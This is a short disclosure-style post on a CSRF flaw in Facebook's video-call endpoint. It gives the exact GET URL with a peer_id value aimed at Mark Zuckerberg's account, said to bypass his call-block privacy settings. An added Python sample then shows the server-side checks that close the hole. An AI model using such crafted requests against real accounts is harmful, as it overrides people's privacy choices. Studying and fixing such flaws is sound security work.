Vulnerability – CSRF
A Cross-Site Request Forgery (CSRF) vulnerability is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user's Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
This vulnerability allows a GET (in-URI) CSRF parameter to be used to bypass the video-calling blocks in Mark Zuckerberg's privacy settings.
___________________________________________________________________
The URL used to video call on Facebook is –
https://www.facebook.com/videocall/incall/
The Vulnerable GET Parameter is –
https://www.facebook.com/videocall/incall/?peer_id=
After the peer_id= parameter, we'll insert Mark Zuckerberg's ID (which is id=4)
Exact URL is –
https://www.facebook.com/videocall/incall/?peer_id=4
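The server-side checks that close this kind of bypass, as an added example that is not part of the original post and is not Facebook's code: the call request is refused over GET, requires a session-bound anti-CSRF token, and peer_id is authorized against the callee's privacy setting. The user table, the setting names and the start_call function are assumptions made for illustration.

```python
import hmac
from dataclasses import dataclass, field

# Constructed sample data: user IDs, settings and token scheme are assumptions.
@dataclass
class User:
    uid: int
    who_can_call: str = "everyone"  # "everyone" | "friends" | "nobody"
    friends: set = field(default_factory=set)
    blocked: set = field(default_factory=set)

USERS = {
    4: User(4, who_can_call="friends", friends={7}),
    7: User(7, friends={4}),
    9: User(9),
}

def may_call(caller: User, callee: User) -> bool:
    """Callee's privacy settings, evaluated on the server for every request."""
    if caller.uid in callee.blocked or callee.who_can_call == "nobody":
        return False
    if callee.who_can_call == "friends":
        return caller.uid in callee.friends
    return True

def start_call(method, caller_id, params, session_token):
    """Return (status, reason) for a call-initiation request."""
    # 1. Starting a call changes state, so a plain GET link must not trigger it.
    if method != "POST":
        return 405, "method not allowed"
    # 2. Anti-CSRF token bound to the session, compared in constant time.
    sent = str(params.get("csrf_token", "")).encode()
    if not hmac.compare_digest(sent, session_token.encode()):
        return 403, "bad csrf token"
    # 3. peer_id is client-controlled: validate it, then authorize it.
    peer_raw = str(params.get("peer_id", ""))
    if not (peer_raw.isascii() and peer_raw.isdigit()) or int(peer_raw) not in USERS:
        return 400, "invalid peer_id"
    caller, callee = USERS[caller_id], USERS[int(peer_raw)]
    if caller.uid == callee.uid or not may_call(caller, callee):
        return 403, "callee does not accept calls from this user"
    return 200, "call started"
```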